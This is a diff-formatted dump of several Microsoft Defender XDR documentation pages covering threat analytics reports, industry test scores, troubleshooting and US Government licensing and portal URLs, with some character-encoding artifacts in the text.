-| [Advanced hunting](#find-subtle-threat-artifacts-using-advanced-hunting) | [Advanced hunting queries](advanced-hunting-overview.md) for proactively identifying possible threat activity. Most queries are provided to supplement detections, especially for locating potentially malicious components or behaviors that couldn't be dynamically assessed to be malicious. |
-| References | Microsoft and third-party publications referenced by analysts during the creation of the report. Threat analytics content is based on data validated by Microsoft researchers. Information from publicly available, third-party sources are identified clearly as such. |
-| Change log | The time the report was published and when significant changes were made to the report. |
-
-## Apply additional mitigations
-
-Threat analytics dynamically tracks the [status of security updates and secure configurations](threat-analytics.md#exposure-and-mitigations-review-list-of-mitigations-and-the-status-of-your-devices). This information is available as charts and tables in the **Exposure & mitigations** tab.
-
-In addition to these tracked mitigations, the analyst report also discusses mitigations that are _not_ dynamically monitored. Here are some examples of important mitigations that are not dynamically tracked:
--- Block emails with _.lnk_ attachments or other suspicious file types-- Randomize local administrator passwords-- Educate end users about phishing email and other threat vectors-- Turn on specific [attack surface reduction rules](/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction)-
-While you can use the **Exposure & mitigations** tab to assess your security posture against a threat, these recommendations let you take additional steps towards improving your security posture. Carefully read all the mitigation guidance in the analyst report and apply them whenever possible.
-
-## Understand how each threat can be detected
-
-The analyst report also provides the detections from Microsoft Defender Antivirus and _endpoint detection and response_ (EDR) capabilities.
-
-### Antivirus detections
-
-These detections are available on devices with [Microsoft Defender Antivirus](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-in-windows-10) turned on. When these detections occur on devices that have been onboarded to Microsoft Defender for Endpoint, they also trigger alerts that light up the charts in the report.
-
-> [!NOTE]
-> The analyst report also lists **generic detections** that can identify a wide-range of threats, in addition to components or behaviors specific to the tracked threat. These generic detections don't reflect in the charts.
-
-### Endpoint detection and response (EDR) alerts
-
-EDR alerts are raised for [devices onboarded to Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/onboard-configure). These alerts generally rely on security signals collected by the Microsoft Defender for Endpoint sensor and other endpoint capabilitiesΓÇösuch as antivirus, network protection, tamper protectionΓÇöthat serve as powerful signal sources.
-
-Like the list of antivirus detections, some EDR alerts are designed to generically flag suspicious behavior that might not be associated with the tracked threat. In such cases, the report will clearly identify the alert as "generic" and that it doesn't influence any of the charts in the report.
-
-### Email-related detections and mitigations
-
-Email-related detections and mitigations from Microsoft Defender for Office 365, are included in analyst reports in addition to the endpoint data already available from Microsoft Defender for Endpoint.
-
-Prevented email attempt information gives you insights on whether your organization was a target of the threat tackled in the analyst report even if the attack has been effectively blocked before delivery or delivered to the junk mail folder.
-
-## Find subtle threat artifacts using advanced hunting
-
-While detections allow you to identify and stop the tracked threat automatically, many attack activities leave subtle traces that require additional inspection. Some attack activities exhibit behaviors that can also be normal, so detecting them dynamically can result in operational noise or even false positives.
-
-[Advanced hunting](advanced-hunting-overview.md) provides a query interface based on Kusto Query Language that simplifies locating subtle indicators of threat activity. It also allows you to surface contextual information and verify whether indicators are connected to a threat.
-
-Advanced hunting queries in the analyst reports have been vetted by Microsoft analysts and are ready for you to run in the [advanced hunting query editor](https://security.microsoft.com/advanced-hunting). You can also use the queries to create [custom detection rules](custom-detection-rules.md) that trigger alerts for future matches.
-
-> [!NOTE]
-> Threat analytics is also available in [Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/threat-analytics). However, it does not have the data integration between Microsoft Defender for Office 365 and Microsoft Defender for Endpoint.
-
-## Related topics
--- [Threat analytics overview](threat-analytics.md)-- [Proactively find threats with advanced hunting](advanced-hunting-overview.md)-- [Custom detection rules](custom-detection-rules.md)
security Threat Analytics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/threat-analytics.md
- Title: Threat analytics in Microsoft Defender XDR-
-description: Learn about emerging threats and attack techniques and how to stop them. Assess their impact to your organization and evaluate your organizational resilience.
--- NOCSH------ m365-security -- m365initiative-m365-defender -- tier1-- Previously updated : 09/18/2023--
-# Threat analytics in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR--
-Threat analytics is our in-product threat intelligence solution from expert Microsoft security researchers. It's designed to assist security teams to be as efficient as possible while facing emerging threats, such as:
--- Active threat actors and their campaigns-- Popular and new attack techniques-- Critical vulnerabilities-- Common attack surfaces-- Prevalent malware-
-Watch this short video to learn more about how threat analytics can help you track the latest threats and stop them.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RWwJfU]
-
-You can access threat analytics either from the upper left-hand side of Microsoft Defender XDR's navigation bar, or from a dedicated dashboard card that shows the top threats to your org, both in terms of known impact, and in terms of your exposure.
--
-Getting visibility on active or ongoing campaigns and knowing what to do through threat analytics can help equip your security operations team with informed decisions.
-
-With more sophisticated adversaries and new threats emerging frequently and prevalently, it's critical to be able to quickly:
--- Identify and react to emerging threats-- Learn if you're currently under attack-- Assess the impact of the threat to your assets-- Review your resilience against or exposure to the threats-- Identify the mitigation, recovery, or prevention actions you can take to stop or contain the threats-
-Each report provides an analysis of a tracked threat and extensive guidance on how to defend against that threat. It also incorporates data from your network, indicating whether the threat is active and if you have applicable protections in place.
-
-## View the threat analytics dashboard
-
-The threat analytics dashboard ([security.microsoft.com/threatanalytics3](https://security.microsoft.com/threatanalytics3)) highlights the reports that are most relevant to your organization. It summarizes the threats in the following sections:
--- **Latest threats**ΓÇölists the most recently published or updated threat reports, along with the number of active and resolved alerts.-- **High-impact threats**ΓÇölists the threats that have the highest impact to your organization. This section lists threats with the highest number of active and resolved alerts first.-- **Highest exposure**ΓÇölists threats to which your org has the highest exposure. Your exposure level to a threat is calculated using two pieces of information: how severe the vulnerabilities associated with the threat are, and how many devices in your organization could be exploited by those vulnerabilities.----
-Select a threat from the dashboard to view the report for that threat. You can also select the Search field to key in a keyword that's related to the threat analytics report that you'd like to read.
-
-#### View reports by category
-
-You can filter the threat report list and view the most relevant reports according to a specific threat type or by type of report.
--- **Threat tags**ΓÇöassist you in viewing the most relevant reports according to a specific threat category. For example, the **Ransomware** tag includes all reports related to ransomware.-- **Report types**ΓÇöassist you in viewing the most relevant reports according to a specific report type. For example, the **Tools & techniques** tag includes all reports that cover tools and techniques.-
-The different tags have equivalent filters that assist you in efficiently reviewing the threat report list and filtering the view based on a specific threat tag or report type. For example, to view all threat reports related to ransomware category, or threat reports that involve vulnerabilities.
-
-The Microsoft Threat Intelligence team has added threat tags to each threat report. Four threat tags are currently available:
- - Ransomware
- - Phishing
- - Vulnerability
- - Activity group
-
-Threat tags are presented at the top of the threat analytics page. There are counters for the number of available reports under each tag.
--
-To set the types of reports you want in the list, select **Filters**, choose from the list, and select **Apply**.
-
- :::image type="content" source="../../media/threat-analytics/ta-threattag-filters-mtp-tb.png" alt-text="Screenshot of the Filters list." lightbox="../../media/threat-analytics/ta-threattag-filters-mtp.png":::
-
-If you have set more than one filter, the threat analytics reports list can also be sorted by threat tag by selecting the threat tags column:
-
- :::image type="content" source="../../media/threat-analytics/ta-taglist-mtp.png" alt-text="Screenshot of the threat tags column." lightbox="../../media/threat-analytics/ta-taglist-mtp.png":::
-
-## View a threat analytics report
-
-Each threat analytics report provides information in several sections:
--- [**Overview**](#overview-quickly-understand-the-threat-assess-its-impact-and-review-defenses)-- [**Analyst report**](#analyst-report-get-expert-insight-from-microsoft-security-researchers)-- [**Related incidents**](#related-incidents-view-and-manage-related-incidents)-- [**Impacted assets**](#impacted-assets-get-list-of-impacted-devices-and-mailboxes)-- [**Prevented email attempts**](#prevented-email-attempts-view-blocked-or-junked-threat-emails)-- [**Exposure & mitigations**](#exposure-and-mitigations-review-list-of-mitigations-and-the-status-of-your-devices)-
-### Overview: Quickly understand the threat, assess its impact, and review defenses
-
-The **Overview** section provides a preview of the detailed analyst report. It also provides charts that highlight the impact of the threat to your organization, and your exposure through misconfigured and unpatched devices.
---
-#### Assess impact on your organization
-
-Each report includes charts designed to provide information about the organizational impact of a threat:
--- **Related incidents**ΓÇöprovides an overview of the impact of the tracked threat to your organization with the following data:
- - Number of active alerts and the number of active incidents they're associated with
- - Severity of active incidents
-- **Alerts over time**ΓÇöshows the number of related **Active** and **Resolved** alerts over time. The number of resolved alerts indicates how quickly your organization responds to alerts associated with a threat. Ideally, the chart should be showing alerts resolved within a few days.-- **Impacted assets**ΓÇöshows the number of distinct devices and email accounts (mailboxes) that currently have at least one active alert associated with the tracked threat. Alerts are triggered for mailboxes that received threat emails. Review both org- and user-level policies for overrides that cause the delivery of threat emails.-- **Prevented email attempts**ΓÇöshows the number of emails from the past seven days that were either blocked before delivery or delivered to the junk mail folder.-
-#### Review security resilience and posture
-
-Each report includes charts that provide an overview of how resilient your organization is against a given threat:
--- **Secure configuration status**ΓÇöshows the number of devices with misconfigured security settings. Apply the recommended security settings to help mitigate the threat. Devices are considered **Secure** if they've applied _all_ the tracked settings.-- **Vulnerability patching status**ΓÇöshows the number of vulnerable devices. Apply security updates or patches to address vulnerabilities exploited by the threat.--
-### Analyst report: Get expert insight from Microsoft security researchers
-
-In the **Analyst report** section, read through the detailed expert write-up. Most reports provide detailed descriptions of attack chains, including tactics and techniques mapped to the MITRE ATT&CK framework, exhaustive lists of recommendations, and powerful [threat hunting](advanced-hunting-overview.md) guidance.
-
-[Learn more about the analyst report](threat-analytics-analyst-reports.md)
-
-### Related incidents: View and manage related incidents
-
-The **Related incidents** tab provides the list of all incidents related to the tracked threat. You can assign incidents or manage alerts linked to each incident.
--
-### Impacted assets: Get list of impacted devices and mailboxes
-
-An asset is considered impacted if it's affected by an active, unresolved alert. The **Impacted assets** tab lists the following types of impacted assets:
--- **Impacted devices**ΓÇöendpoints that have unresolved Microsoft Defender for Endpoint alerts. These alerts typically fire on sightings of known threat indicators and activities.-- **Impacted mailboxes**ΓÇömailboxes that have received email messages that have triggered Microsoft Defender for Office 365 alerts. While most messages that trigger alerts are typically blocked, user- or org-level policies can override filters.---
-### Prevented email attempts: View blocked or junked threat emails
-
-Microsoft Defender for Office 365 typically blocks emails with known threat indicators, including malicious links or attachments. In some cases, proactive filtering mechanisms that check for suspicious content will instead send threat emails to the junk mail folder. In either case, the chances of the threat launching malware code on the device is reduced.
-
-The **Prevented email attempts** tab lists all the emails that have either been blocked before delivery or sent to the junk mail folder by Microsoft Defender for Office 365.
---
-### Exposure and mitigations: Review list of mitigations and the status of your devices
-
-In the **Exposure & mitigations** section, review the list of specific actionable recommendations that can help you increase your organizational resilience against the threat. The list of tracked mitigations includes:
--- **Security updates**ΓÇödeployment of supported software security updates for vulnerabilities found on onboarded devices-- **Supported security configurations**
- - Cloud-delivered protection
- - Potentially unwanted application (PUA) protection
- - Real-time protection
-
-Mitigation information in this section incorporates data from [Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt), which also provides detailed drill-down information from various links in the report.
---
-_Exposure & mitigations section of a threat analytics report_
-
-## Set up email notifications for report updates
-
-You can set up email notifications that will send you updates on threat analytics reports. To create email notifications, follow the steps in [get email notifications for Threat analytics updates in Microsoft Defender XDR](m365d-threat-analytics-notifications.md).
-
-## Additional report details and limitations
-
-> [!NOTE]
-> As part of the unified security experience, threat analytics is now available not just for Microsoft Defender for Endpoint, but also for Microsoft Defender for Office 365 license holders.
->
-> If you are not using the Microsoft 365 security portal (Microsoft Defender XDR), you can also see the report details (without the Microsoft Defender for Office data) in the Microsoft Defender Security Center portal (Microsoft Defender for Endpoint).
-
-To access threat analytics reports, you need certain roles and permissions. See [Custom roles in role-based access control for Microsoft Defender XDR](custom-roles.md) for details.
--- To view alerts, incidents, or impacted assets data, you need to have permissions to Microsoft Defender for Office or Microsoft Defender for Endpoint alerts data, or both.-- To view prevented email attempts, you need to have permissions to Microsoft Defender for Office hunting data.-- To view mitigations, you need to have permissions to Defender Vulnerability Management data in Microsoft Defender for Endpoint.-
-When looking at the threat analytics data, remember the following factors:
--- Charts reflect only mitigations that are tracked. Check the report overview for additional mitigations that aren't shown in the charts.-- Mitigations don't guarantee complete resilience. The provided mitigations reflect the best possible actions needed to improve resiliency.-- Devices are counted as "unavailable" if they haven't transmitted data to the service.-- Antivirus-related statistics are based on Microsoft Defender Antivirus settings. Devices with third-party antivirus solutions can appear as "exposed".-
-## Related articles
--- [Proactively find threats with advanced hunting](advanced-hunting-overview.md)-- [Understand the analyst report section](threat-analytics-analyst-reports.md)-- [Assess and resolve security weaknesses and exposures](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)
security Tickets https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/tickets.md
- Title: Integrate ServiceNow tickets into the Microsoft Defender portal and compliance center
-description: Learn how to create and track tickets in ServiceNow from the Microsoft Defender portal and compliance center.
-
- - NOCSH
----
- - M365-security-compliance
- - tier3
-
- - MOE150
- - MET150
-
- - seo-marvel-apr2020
Previously updated : 02/16/2021--
-# Integrate ServiceNow tickets into the Microsoft Defender portal and compliance center
--
-> [!CAUTION]
-> **The preview period for the ServiceNow connector has ended**
->
-> This capability is no longer available. Thank you for your feedback and continued support while we determine next steps.
-
-ServiceNow is a popular cloud computing platform that helps companies manage digital workflows for enterprise operations. Their Now platform has IT workflows, employee workflows, and customer workflows.
security Top Scoring Industry Tests https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/top-scoring-industry-tests.md
- Title: Top scoring in industry tests - Microsoft Defender XDR-
-description: View the latest scores and analysis of Microsoft Defender XDR. It consistently achieves high scores in independent tests (AV-TEST, AV Comparatives, SE Labs, MITRE ATT&CK). View the latest scores and analysis.
-----
- -m365-security-compliance
- - tier3
- Previously updated : 02/16/2021--
-# Top scoring in industry tests
--
-[Microsoft Defender XDR](https://www.microsoft.com/security/business/threat-protection/integrated-threat-protection) technologies consistently achieve high scores in independent tests, demonstrating the strength of its enterprise threat protection capabilities. Microsoft aims to be transparent about these test scores. This page summarizes the results and provides analysis.
-
-<a name='microsoft-365-defender'></a>
-
-## Microsoft Defender XDR
-
-[Microsoft Defender XDR](microsoft-365-defender.md) is a unified pre- and post-breach enterprise defense suite. It natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks.
-
-Microsoft Defender XDR combines the capabilities of [Microsoft Defender for Endpoint](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp), [Microsoft Defender for Office 365](https://www.microsoft.com/microsoft-365/exchange/advance-threat-protection), [Microsoft Defender for Identity](https://azure.microsoft.com/features/azure-advanced-threat-protection/), [Microsoft Entra ID Protection](/azure/active-directory/identity-protection/overview-identity-protection), and [Microsoft Defender for Cloud Apps](https://www.microsoft.com/microsoft-365/enterprise-mobility-security/cloud-app-security) into a single solution.
-
-### MITRE: Demonstrated real-world detection, response, and protection from advanced attacks
-
-Core to MITRE's testing approach is emulating real-world attacks to understand whether solutions can adequately detect and respond to them. While the test focused on endpoint detection and response, MITRE's simulated APT29 attack spans multiple attack domains, creating opportunities to empower defenders beyond just endpoint protection. Microsoft expanded visibility beyond the endpoint with Microsoft Defender XDR.
--- ATT&CK-based evaluation of Microsoft Defender XDR - April 2022: [Microsoft Defender XDR demonstrates industry-leading protection in the 2022 MITRE Engenuity ATT&CK&reg; Evaluations]([Microsoft Security Blog: Microsoft Defender XDR demonstrates industry-leading protection in the 2022 MITRE Engenuity ATT&CK&reg; Evaluations](https://www.microsoft.com/en-us/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/))--- ATT&CK-based evaluation of Microsoft Defender XDR - April 2021: [Evaluation proves Microsoft Defender for Endpoint stops advanced attacks across platforms](https://www.microsoft.com/security/blog/2021/04/21/)-
- Microsoft Defender XDR provided nearly 100 percent coverage across the attack chain stages. It delivered leading out-of-box visibility into attacker activities. The visibility dramatically reduces manual work for the security operations center and vendor solutions that relied on specific configuration changes. Microsoft Defender XDR also had the fewest gaps in visibility, diminishing attacker ability to operate undetected.
-
-## Next generation protection
-
-[Microsoft Defender Antivirus](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-in-windows-10) consistently performs highly in independent tests, displaying how it's a top choice in the antivirus market. Keep in mind, these tests only provide results for antivirus and don't test for additional security protections.
-
-Microsoft Defender Antivirus is the [next generation protection](https://www.youtube.com/watch?v=Xy3MOxkX_o4) capability in the [Microsoft Defender for Endpoint Windows security stack](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection) that addresses the latest and most sophisticated threats today. In some cases, customers might not even know they were protected because a cyberattack is stopped [milliseconds after a campaign starts](https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign). That's because Microsoft Defender Antivirus and other [endpoint protection platform (EPP)](https://www.microsoft.com/security/blog/2019/08/23/gartner-names-microsoft-a-leader-in-2019-endpoint-protection-platforms-magic-quadrant/) capabilities in Defender for Endpoint detect and stop malware at first sight. They use [machine learning](https://cloudblogs.microsoft.com/microsoftsecure/2018/06/07/machine-learning-vs-social-engineering), [artificial intelligence](https://cloudblogs.microsoft.com/microsoftsecure/2018/02/14/how-artificial-intelligence-stopped-an-emotet-outbreak), behavioral analysis, and other advanced technologies.
-
-### AV-TEST: Protection score of 6.0/6.0 in the latest test
-
-The AV-TEST Product Review and Certification Report tests on three categories: protection, performance, and usability. The following scores are for the Protection category that has two scores: Real-World Testing and the AV-TEST reference set (known as "Prevalent Malware").
--- 2022 AV-TEST Award ΓÇô for tested IT Security: [Best Advanced Protection for Consumer Users and Best Advanced Protection](https://www.av-test.org/en/news/av-test-award-2022-for-microsoft/)--- November - December 2021 AV-TEST Business User test: [Protection score 6.0/6.0](https://www.av-test.org/en/antivirus/business-windows-client/windows-10/december-2021/microsoft-defender-antivirus-4.18-212622/) <sup>**Latest**</sup>-
- Microsoft Defender Antivirus achieved a perfect Protection score of 6.0/6.0, with 100% in November and December. 18,870 malware samples were used.
--- September - October 2021 AV-TEST Business User test: [Protection score 6.0/6.0](https://www.av-test.org/en/antivirus/business-windows-client/windows-10/october-2021/microsoft-defender-antivirus-4.18-212518/)--- July - August 2021 AV-TEST Business User test: [Protection score 6.0/6.0](https://www.av-test.org/en/antivirus/business-windows-client/windows-10/august-2021/microsoft-defender-antivirus-4.18-212419/)--- May - June 2021 AV-TEST Business User test: [Protection score 6.0/6.0](https://www.av-test.org/en/antivirus/business-windows-client/windows-10/june-2021/microsoft-defender-antivirus-4.18-212318/)--- March - April 2021 AV-TEST Business User test: [Protection score 6.0/6.0](https://www.av-test.org/en/antivirus/business-windows-client/windows-10/april-2021/microsoft-defender-antivirus-4.18-212216/)--- January - February 2021 AV-TEST Business User test: [Protection score 6.0/6.0](https://www.av-test.org/en/antivirus/business-windows-client/windows-10/february-2021/microsoft-defender-antivirus-4.18-212117/) | [Analysis](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4CflZ)-
-### AV-Comparatives: Protection rating of 99.8% in the latest test
-
-Business Security Test consists of three main parts: the Real-World Protection Test that mimics online malware attacks, the Malware Protection Test where the malware enters the system from outside the internet (for example by USB), and the Performance Test that looks at the impact on the system's performance.
--- Business Security Test 2021 (August - November): [Real-World Protection Rate 99.8%](https://www.av-comparatives.org/tests/business-security-test-2021-august-november/) <sup>**Latest**</sup>-
- Microsoft Defender Antivirus has scored consistently high in Real-World Protection Rates over the past year, with 99.8% in the latest test.
--- Business Security Test 2021 (March - June): [Real-World Protection Rate 99.7%](https://www.av-comparatives.org/tests/business-security-test-2021-march-june/)--- Business Security Test 2020 (August - November): [Real-World Protection Rate 99.8%](https://www.av-comparatives.org/tests/business-security-test-2020-august-november/)--- Business Security Test 2020 (March - June): [Real-World Protection Rate 99.7%](https://www.av-comparatives.org/tests/business-security-test-2020-march-june/) | [Analysis](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE3Esbl)-
-### SE Labs: AAA award in the latest test
-
-SE Labs test a range of solutions used by products and services to detect and/or protect against attacks. It includes endpoint software, network appliances, and cloud services.
--- Best Email Security Service of 2023: [AAA award](https://www.microsoft.com/en-us/security/blog/2023/02/21/microsoft-defender-for-office-365-named-best-email-security-service-of-2023-by-se-labs/)--- Annual Report 2020 - 2021: [AAA award](https://selabs.uk/wp-content/uploads/2021/11/annual-report-2021.pdf) <sup>**Latest**</sup>--- Enterprise Endpoint Protection: October - December 2021: [AAA award](https://selabs.uk/wp-content/uploads/2021/12/oct-dec-2021-enterprise.pdf)--- Enterprise Advanced Security (EDR): Kaspersky: August to September 2021: [AAA award](https://selabs.uk/wp-content/uploads/2021/12/AS-EDR-Kaspersky-EDR-2021-1.pdf)--- Enterprise Advanced Security (EDR): Crowdstrike: August to September 2021: [AAA award](https://selabs.uk/wp-content/uploads/2021/12/AS-EDR-Crowdstrike-Falcon-2021-1.pdf)--- Breach Response (NDR Detection): VMware NSX Network Detection and Response: August 2021: [AAA award](https://selabs.uk/wp-content/uploads/2021/10/NDR-VMware-NSX-detection-2021-1.pdf)--- Enterprise Endpoint Protection: July - September 2021: [AAA award](https://selabs.uk/wp-content/uploads/2021/11/july-sept-2021-enterprise.pdf)--- Breach Response (Protection): BlackBerry Protect and Optics: July 2021: [AAA award](https://selabs.uk/wp-content/uploads/2021/07/BRT-BlackBerry-Protect-protection-2021-1.pdf)--- Enterprise Endpoint Protection: April - June 2021: [AAA award](https://selabs.uk/wp-content/uploads/2021/07/apr-jun-2021-enterprise-1.pdf)--- Enterprise Endpoint Protection: January - March 2021: [AAA award](https://selabs.uk/wp-content/uploads/2021/04/jan-mar-2021-enterprise.pdf) <sup>**pdf**</sup>-
-## Endpoint detection & response
-
-Microsoft Defender for Endpoint [endpoint detection and response](/windows/security/threat-protection/microsoft-defender-atp/overview-endpoint-detection-response) capabilities provide advanced attack detections that are near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a breach, and take response actions to remediate threats.
-
-Microsoft Defender for Endpoint's EDR and endpoint protection capabilities have received positive results from industry tests and publications. [SC Labs assessed endpoint security tools](https://www.scmagazine.com/home/reviews/sc-product-reviews-endpoint-security/) in June 2020, and gave Microsoft Defender for Endpoint [5/5 stars](https://www.scmagazine.com/review/microsoft-defender-advanced-threat-protection/). They called out Microsoft Defender for Endpoint's ability to protect organizations against the modern threat landscape using a full set of security capabilities. SC Labs also identified the endpoint security solution as holistic and unified. They also acknowledged the convergence of endpoint protection with endpoint detection and response functionality, because the attack chain now gets fully covered by solutions.
-
-## To what extent are tests representative of protection in the real world?
-
-Independent security industry tests aim to evaluate the best antivirus and security products in an unbiased manner. However, Microsoft sees a wider and broader set of threats beyond what's tested in the evaluations highlighted in this article. In an average month, Microsoft's security products identify over 100 million new threats. Even if an independent tester can acquire and test 1% of those threats, that is a million tests across 20 or 30 products. In other words, the vastness of the malware landscape makes it difficult to evaluate the quality of protection against real world threats.
-
-The capabilities within Microsoft Defender for Endpoint provide [additional layers of protection](https://cloudblogs.microsoft.com/microsoftsecure/2017/12/11/detonating-a-bad-rabbit-windows-defender-antivirus-and-layered-machine-learning-defenses) that aren't factored into industry antivirus tests, and address some of the latest and most sophisticated threats. Isolating AV from the rest of Defender for Endpoint creates a partial picture of how Microsoft's security stack operates in the real world. For example, attack surface reduction and endpoint detection & response capabilities can help prevent malware from getting onto devices in the first place. We've proven that [Microsoft Defender for Endpoint components catch samples](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2ouJA) that Microsoft Defender Antivirus missed in these industry tests. It's more representative of how effectively Microsoft's security suite protects customers in the real world.
-
-[Learn more about Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection) and evaluate it in your own network by signing up for a [90-day trial](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp), or [enabling Preview features on existing tenants](/windows/security/threat-protection/microsoft-defender-atp/preview).
-
-[Learn more about Microsoft Defender XDR](https://www.microsoft.com/security/business/threat-protection/integrated-threat-protection) or [start using the service](m365d-enable.md).
security Troubleshoot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/troubleshoot.md
- Title: Troubleshoot Microsoft Defender XDR service issues
-description: Find solutions and workarounds to known Microsoft Defender XDR issues.
-
- - NOCSH
------ m365-security-compliance-- tier3-
- - MOE150
- - MET150
Previously updated : 03/28/2024--
-# Troubleshoot Microsoft Defender XDR service issues
---
-**Applies to:**
-- Microsoft Defender XDR-
-This section addresses issues that might arise as you use the Microsoft Defender XDR service.
-
-<a name='i-dont-see-microsoft-365-defender-content'></a>
-
-## I don't see Microsoft Defender XDR content
-
-If you don't see capabilities on the navigation pane such as the Incidents, Action center, or Hunting in your portal, you need to verify that your tenant has the appropriate licenses.
-
-For more information, see [Prerequisites](prerequisites.md).
-
-<a name='microsoft-defender-for-identity-alerts-are-not-showing-up-in-the-microsoft-365-defender-incidents'></a>
-
-## Microsoft Defender for Identity alerts are not showing up in the Microsoft Defender XDR incidents
-
-If you have Microsoft Defender for Identity deployed in your environment but you're not seeing Defender for Identity alerts as part of Microsoft Defender XDR incidents, you need to ensure that the Microsoft Defender for Cloud Apps and Defender for Identity integration is enabled.
-
-For more information, see [Microsoft Defender for Identity integration](/cloud-app-security/mdi-integration).
-
-## Where is the settings page for turning on the service?
-
-To turn on Microsoft Defender XDR, access **Settings** from the navigation pane in the Microsoft Defender portal. This navigation item is visible only if you have the [prerequisite permissions and licenses](m365d-enable.md#check-license-eligibility-and-required-permissions).
-
-## How do I create an exception for my file/URL?
-
-A false positive is a file or URL that is detected as malicious but isn't a threat. You can create indicators and define exclusions to unblock and allow certain files/URLs. See [Address false positives/negatives in Defender for Endpoint](/microsoft-365/security/defender-endpoint/defender-endpoint-false-positives-negatives).
security Usgov https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/usgov.md
- Title: Microsoft Defender XDR for US Government customers
-description: Learn about the Microsoft Defender XDR for US Government customers requirements and capabilities available
------- m365-security-compliance-- tier3- Previously updated : 12/07/2021--
-# Microsoft Defender XDR for US Government customers
-
-**Applies to:**
-- Microsoft Defender XDR-
-Microsoft Defender XDR for US Government customers, built in the Azure US Government environment, uses the same underlying technologies as Microsoft Defender XDR in Azure Commercial.
-
-This offering is available to GCC, GCC High, and DoD customers and is based on the same prevention, detection, investigation, and remediation as the commercial version. However, there are some differences in the availability of capabilities for this offering.
-
-> [!NOTE]
-> If you are a GCC customer using Defender for Cloud Apps, Defender for Endpoint, or Defender for Identity in Commercial, you need to transition those services to their GCC versions to be eligible for Microsoft Defender XDR GCC.
-
-## Licensing requirements
-
-Microsoft Defender XDR for US Government customers requires one of the following Microsoft volume licensing offers:
-
-### Desktop licensing
-
-<br />
-
-****
-
-|GCC|GCC High|DoD|
-||||
-|Microsoft 365 GCC G5|Microsoft 365 E5 for GCC High|Microsoft 365 G5 for DOD|
-|Microsoft 365 G5 Security GCC|Microsoft 365 G5 Security for GCC High|Microsoft 365 G5 Security for DOD|
-|Enterprise Mobility + Security G5 GCC|Enterprise Mobility + Security E5 for GCC High|Enterprise Mobility + Security E5 for DOD|
-|Office 365 G5 GCC|Office 365 E5 for GCC High|Office 365 E5 for DOD|
-|Microsoft Defender for Cloud Apps GCC|Microsoft Defender for Cloud Apps for GCC High|Microsoft Defender for Cloud Apps for DOD|
-|Microsoft Defender for Endpoint - GCC|Microsoft Defender for Endpoint for GCC High|Microsoft Defender for Endpoint for DOD|
-|Microsoft Defender for Identity - GCC|Microsoft Defender for Identity for GCC High|Microsoft Defender for Identity for DOD|
-|Microsoft Defender for Office 365 (Plan 2) GCC|Microsoft Defender for Office 365 (Plan 2) for GCC High|Microsoft Defender for Office 365 (Plan 2) for DOD|
-|Windows 10 Enterprise E5 GCC|Windows 10 Enterprise E5 for GCC High|Windows 10 Enterprise E5 for DOD|
-|
-
-### Server licensing
-
-<br />
-
-****
-
-|GCC|GCC High|DoD|
-||||
-|Microsoft Defender for Endpoint Server GCC|Microsoft Defender for Endpoint Server for GCC High|Microsoft Defender for Endpoint Server for DOD|
-|Microsoft Defender for servers|Microsoft Defender for servers - Government|Microsoft Defender for servers - Government|
-|
-
-## Portal URLs
-
-The following are the Microsoft Defender portal URLs for US Government customers:
-
-<br />
-
-****
-
-|Customer type|Portal URL|
-|||
-|GCC|<https://security.microsoft.com>|
-|GCC High|[https://security.microsoft.us](https://security.microsoft.us)|
-|DoD|[https://security.apps.mil](https://security.apps.mil)|
-|
-> [!NOTE]
-> If you are a GCC customer and in the process of moving from Microsoft Defender for Endpoint commercial to GCC, use https://transition.security.microsoft.com to access your Microsoft Defender for Endpoint commercial data.
-
-## API
-
-Instead of the public URIs listed in our [API documentation](api-overview.md), you'll need to use the following URIs:
-
-<br />
-
-****
-
-|Endpoint type|GCC|GCC High & DoD|
-||||
-|Login|`https://login.microsoftonline.com`|`https://login.microsoftonline.us`|
-|Microsoft Defender XDR API|`https://api-gcc.security.microsoft.us`|`https://api-gov.security.microsoft.us`|
-|
-
-## Feature parity with commercial
-
-Microsoft Defender XDR for US Government customers doesn't have complete parity with the commercial offering. While our goal is to deliver all commercial features and functionality to our US Government customers, there are some capabilities not yet available we want to highlight.
-
-These are the known gaps:
-
-<br />
-
-****
-
-|Feature name|GCC|GCC High|DoD|
-||::|::|::|
-|Microsoft Threat Experts|![No](../defender-endpoint/media/svg/check-no.svg) On engineering backlog|![No](../defender-endpoint/media/svg/check-no.svg) On engineering backlog|![No](../defender-endpoint/media/svg/check-no.svg) On engineering backlog|
-
-For detailed list of Event Streaming API tables, see [Microsoft Defender XDR streaming event types supported in Event Streaming API](supported-event-types.md).
-
-## More details
-
-For more information, see the individual workloads US Gov pages:
